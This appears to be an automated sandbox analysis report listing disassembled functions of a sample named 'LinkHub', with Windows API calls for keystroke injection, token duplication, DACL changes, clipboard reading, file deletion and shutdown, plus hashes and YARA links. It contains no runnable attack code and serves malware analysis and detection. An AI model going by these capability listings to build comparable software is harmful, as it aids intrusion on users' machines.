Function 00B1FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00B1FC86
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B5FCB8
IsIconic.USER32(00000000), ref: 00B5FCC1
ShowWindow.USER32(00000000,00000009), ref: 00B5FCCE
SetForegroundWindow.USER32(00000000), ref: 00B5FCD8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B5FCEE
GetCurrentThreadId.KERNEL32 ref: 00B5FCF5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B5FD01
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B5FD12
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B5FD1A
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B5FD22
SetForegroundWindow.USER32(00000000), ref: 00B5FD25
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5FD3A
keybd_event.USER32(00000012,00000000), ref: 00B5FD45
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5FD4F
keybd_event.USER32(00000012,00000000), ref: 00B5FD54
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5FD5D
keybd_event.USER32(00000012,00000000), ref: 00B5FD62
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5FD6C
keybd_event.USER32(00000012,00000000), ref: 00B5FD71
SetForegroundWindow.USER32(00000000), ref: 00B5FD74
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B5FD9B

Strings

Shell_TrayWnd, xrefs: 00B5FCB3

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f90284660003a66638c981e84608a101c2f63bdbd4e50cfba2e5b958f2f42603
Instruction ID: c46b7e2af0671fa5db06323ea7a99f4ec08beee3e1cd16a911c81c74cc979ed6
Opcode Fuzzy Hash: f90284660003a66638c981e84608a101c2f63bdbd4e50cfba2e5b958f2f42603
Instruction Fuzzy Hash: 4E319871A402187BEB206BB65D49F7F7EBCEB44B51F1100B6FA01E71D1DAB05D00AB60

Function 00B61B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00B62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6205A
Part of subcall function 00B62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B62087
Part of subcall function 00B62010: GetLastError.KERNEL32 ref: 00B62097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B61BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B61BF4
CloseHandle.KERNEL32(?), ref: 00B61C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B61C1D
GetProcessWindowStation.USER32 ref: 00B61C36
SetProcessWindowStation.USER32(00000000), ref: 00B61C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B61C5C

Part of subcall function 00B61A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B61B48), ref: 00B61A20
Part of subcall function 00B61A0B: CloseHandle.KERNEL32(?,?,00B61B48), ref: 00B61A35

Strings

default, xrefs: 00B61C57
, xrefs: 00B61BA6
winsta0, xrefs: 00B61C18

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: bcbd965b0322616b587410827356709eb90a7e39e82645283959c282260367d1
Instruction ID: f4fae4de7315ed65ab373d7a204601d5d1e764bc69c3e57e7e66a80bbe884cb4
Opcode Fuzzy Hash: bcbd965b0322616b587410827356709eb90a7e39e82645283959c282260367d1
Instruction Fuzzy Hash: 61818171900209AFDF119FA9DD49FEE7BF8EF04304F1848AAF914A71A0DB798955CB50

Function 00B614AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B61A60
Part of subcall function 00B61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A6C
Part of subcall function 00B61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A7B
Part of subcall function 00B61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B614E7,?,?,?), ref: 00B61A82
Part of subcall function 00B61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B61A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B61518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B6154C
GetLengthSid.ADVAPI32(?), ref: 00B61563
GetAce.ADVAPI32(?,00000000,?), ref: 00B6159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B615B9
GetLengthSid.ADVAPI32(?), ref: 00B615D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B615D8
HeapAlloc.KERNEL32(00000000), ref: 00B615DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B61600
CopySid.ADVAPI32(00000000), ref: 00B61607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B61636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B61658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B6166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B61691
HeapFree.KERNEL32(00000000), ref: 00B61698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B616A1
HeapFree.KERNEL32(00000000), ref: 00B616A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B616B1
HeapFree.KERNEL32(00000000), ref: 00B616B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00B616C4
HeapFree.KERNEL32(00000000), ref: 00B616CB

Part of subcall function 00B61ADF: GetProcessHeap.KERNEL32(00000008,00B614FD,?,00000000,?,00B614FD,?), ref: 00B61AED
Part of subcall function 00B61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B614FD,?), ref: 00B61AF4
Part of subcall function 00B61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B614FD,?), ref: 00B61B03

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 509a18a43689a905d05401e7d13a78921b17a329971d7fbb21a4f7edaea698fd
Instruction ID: abdaa4292b47e8d109f051d599e37b3e400dbf8de1c846afa8b220ca167d23e2
Opcode Fuzzy Hash: 509a18a43689a905d05401e7d13a78921b17a329971d7fbb21a4f7edaea698fd
Instruction Fuzzy Hash: 5A715DB6900219ABDF10DFA9DD44FEEBBB8FF04340F184956E915E71A0DB359905CBA0

Function 00B7F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B9DCD0), ref: 00B7F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B7F594
GetClipboardData.USER32(0000000D), ref: 00B7F5A0
CloseClipboard.USER32 ref: 00B7F5AC
GlobalLock.KERNEL32(00000000), ref: 00B7F5E4
CloseClipboard.USER32 ref: 00B7F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00B7F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00B7F626
GetClipboardData.USER32(00000001), ref: 00B7F62E
GlobalLock.KERNEL32(00000000), ref: 00B7F63F
GlobalUnlock.KERNEL32(00000000), ref: 00B7F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00B7F695
GetClipboardData.USER32(0000000F), ref: 00B7F6A1
GlobalLock.KERNEL32(00000000), ref: 00B7F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B7F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B7F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B7F72F
GlobalUnlock.KERNEL32(00000000), ref: 00B7F750
CountClipboardFormats.USER32 ref: 00B7F771
CloseClipboard.USER32 ref: 00B7F7B6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: f31ad2a975eb2575368032576d38ff103fa712d279d3a6fd1b009aca62855639
Instruction ID: ed70c9f9b35ed50d912424deb2749bfed8a486f7b3d8d38e143ec0ab494aa211
Opcode Fuzzy Hash: f31ad2a975eb2575368032576d38ff103fa712d279d3a6fd1b009aca62855639
Instruction Fuzzy Hash: 52619D312042029FD304EF25D885E3ABBE4EF84744F1485AAF46A872A2DF31ED45DB62

Function 00B773D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B77403
FindClose.KERNEL32(00000000), ref: 00B77457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B77493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B774BA

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B774F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B77524

Strings

%02d, xrefs: 00B77645, 00B7764F, 00B7769F, 00B776EF, 00B7773F, 00B7778F
%4d%02d%02d%02d%02d%02d, xrefs: 00B775AF
%03d, xrefs: 00B777E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00B77577
%4d, xrefs: 00B775F6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 85401d7e263bf66b6fc5ae566b15e5411db9a77e7eb0331aba28b11b240b6f65
Instruction ID: 5875491c12d5c9bb9d2d826f4122aac5c97ece877654899ab6df36cdcd3f7690
Opcode Fuzzy Hash: 85401d7e263bf66b6fc5ae566b15e5411db9a77e7eb0331aba28b11b240b6f65
Instruction Fuzzy Hash: 76D15072508344AEC310EB64C885EBBBBECEF88704F44499DF599D6192EB74DA44CB62

Function 00B7A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B7A0A8
GetFileAttributesW.KERNEL32(?), ref: 00B7A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00B7A100
FindNextFileW.KERNEL32(00000000,?), ref: 00B7A118
FindClose.KERNEL32(00000000), ref: 00B7A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7A18F
SetCurrentDirectoryW.KERNEL32(00BC7B94), ref: 00B7A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7A1B7
FindClose.KERNEL32(00000000), ref: 00B7A1C4
FindClose.KERNEL32(00000000), ref: 00B7A1D4

Strings

*.*, xrefs: 00B7A13A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: b1e303ba69857de716c9151df655fbf2590352e9a2af4d2909b15e9d947a2ffa
Instruction ID: d6c666679c58eee8dc08648c9233d4b51d822aae1b085a46828aa51cf3131d70
Opcode Fuzzy Hash: b1e303ba69857de716c9151df655fbf2590352e9a2af4d2909b15e9d947a2ffa
Instruction Fuzzy Hash: 7331F9325002196BEF209FB5DD49EDE77ECDF46320F5085D6E829E3090EB70DE448A65

Function 00B74763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B74785
_wcslen.LIBCMT ref: 00B747B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B747E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B74803
RemoveDirectoryW.KERNEL32(?), ref: 00B74813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B7489A
CloseHandle.KERNEL32(00000000), ref: 00B748A5
CloseHandle.KERNEL32(00000000), ref: 00B748B0

Strings

\??\%s, xrefs: 00B747A0
:, xrefs: 00B747C7
\, xrefs: 00B747BC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 669a63598bea7950444ecbe2e0de0ed1948a914adfc1c08b1bc3eef8382eb93d
Instruction ID: a73f20331167935f8d6c4db77734970a08596827cc7dbcb2cf4b627981af3fb4
Opcode Fuzzy Hash: 669a63598bea7950444ecbe2e0de0ed1948a914adfc1c08b1bc3eef8382eb93d
Instruction Fuzzy Hash: D231B27250425AABDB219FA0DC49FEB37FDEF89701F5080F6F619D2060EB7096448B25

Function 00B7A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B7A203
FindNextFileW.KERNEL32(00000000,?), ref: 00B7A25E
FindClose.KERNEL32(00000000), ref: 00B7A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00B7A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7A2D5
SetCurrentDirectoryW.KERNEL32(00BC7B94), ref: 00B7A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B7A2FD
FindClose.KERNEL32(00000000), ref: 00B7A30A
FindClose.KERNEL32(00000000), ref: 00B7A31A

Part of subcall function 00B6E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B6E3B4

Strings

*.*, xrefs: 00B7A280

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: c30c3f480453170c18c92db71984480e6ce16afce72cb5233ff9e5c1c7248d67
Instruction ID: 2bbfde29c70efd0f5785187ec719285c6b9303df7922cfab34fcfad3117a12cf
Opcode Fuzzy Hash: c30c3f480453170c18c92db71984480e6ce16afce72cb5233ff9e5c1c7248d67
Instruction Fuzzy Hash: 0331F6715006196EDF20AFA5EC49EDE77ECDF85324F2081D6E828A30A1DB31DE458A65

Function 00B8C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8C10E,?,?), ref: 00B8D415
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D451
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4C8
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B8C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B8CA09
RegCloseKey.ADVAPI32(00000000), ref: 00B8CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B8CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B8CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B8CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B8CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B8CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B8CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B8CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00B8CDEF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 3d8a210bac33b44805f779dc6d0c8280dcc3762e58c67b1650c25070ff9f6336
Instruction ID: d25d97b13e440a2274fc5d6e87da61d762d14c5f09b88e7efd48ed8a233525c5
Opcode Fuzzy Hash: 3d8a210bac33b44805f779dc6d0c8280dcc3762e58c67b1650c25070ff9f6336
Instruction Fuzzy Hash: 040220B16042009FD715DF28C895E2ABBE5EF49314F18C4ADF849DB2A2DB31ED46CB61

Function 00B6D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B055D1,?,?,00B44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B05871

Part of subcall function 00B6EAB0: GetFileAttributesW.KERNEL32(?,00B6D840), ref: 00B6EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00B6D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B6DA88
MoveFileW.KERNEL32(?,?), ref: 00B6DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B6DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B6DAE2

Part of subcall function 00B6DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B6DAC7,?,?), ref: 00B6DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00B6DAFE
FindClose.KERNEL32(00000000), ref: 00B6DB0F

Strings

\*.*, xrefs: 00B6D978, 00B6D981, 00B6D996

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 722a973ef1b3a9057c010e29cabac6bb677336e8442569d2b32ea1dab0b5d9b6
Instruction ID: cbbcafd90523da23c4cee70e2a15fd0fd57dd361bec269365e5bbf261af88be6
Opcode Fuzzy Hash: 722a973ef1b3a9057c010e29cabac6bb677336e8442569d2b32ea1dab0b5d9b6
Instruction Fuzzy Hash: 03613731D05109AACF05EBE0DA92EEDBBF5AF15300F2441E9E402B7191EB35AF09DB60

Function 00B7F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B7F7EE
EmptyClipboard.USER32 ref: 00B7F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00B7F809
CloseClipboard.USER32 ref: 00B7F900

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2338f6c858bad5572e54ff72872a4392c0a285727827833ddcfae13df0396f17
Instruction ID: 316587a4ad91309e52332994d185a069409a9b7d1c8a35a44ce45aa9a5d16d9b
Opcode Fuzzy Hash: 2338f6c858bad5572e54ff72872a4392c0a285727827833ddcfae13df0396f17
Instruction Fuzzy Hash: BF416E31604612EFD714CF15D988B25BBE4FF44318F14C4AAE4298F662CB35ED42CBA5

Function 00B6F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6205A
Part of subcall function 00B62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B62087
Part of subcall function 00B62010: GetLastError.KERNEL32 ref: 00B62097

ExitWindowsEx.USER32(?,00000000), ref: 00B6F249

Strings

, xrefs: 00B6F273
SeShutdownPrivilege, xrefs: 00B6F219
, xrefs: 00B6F237
@, xrefs: 00B6F23C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: d84345f0c655bd7ed5988f3b5edaa4922c9b45d081f4b4048e4ab22d0acf9d01
Instruction ID: c95f841d859a35a61da226e712dc246234942dfcabded11522b8ab1331cbbb71
Opcode Fuzzy Hash: d84345f0c655bd7ed5988f3b5edaa4922c9b45d081f4b4048e4ab22d0acf9d01
Instruction Fuzzy Hash: 2901267A7102116BEB1427B8ADEAFBA73ECDB08344F1505B1FD12E30D1D9688C449990

Function 00B81C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B81CD3
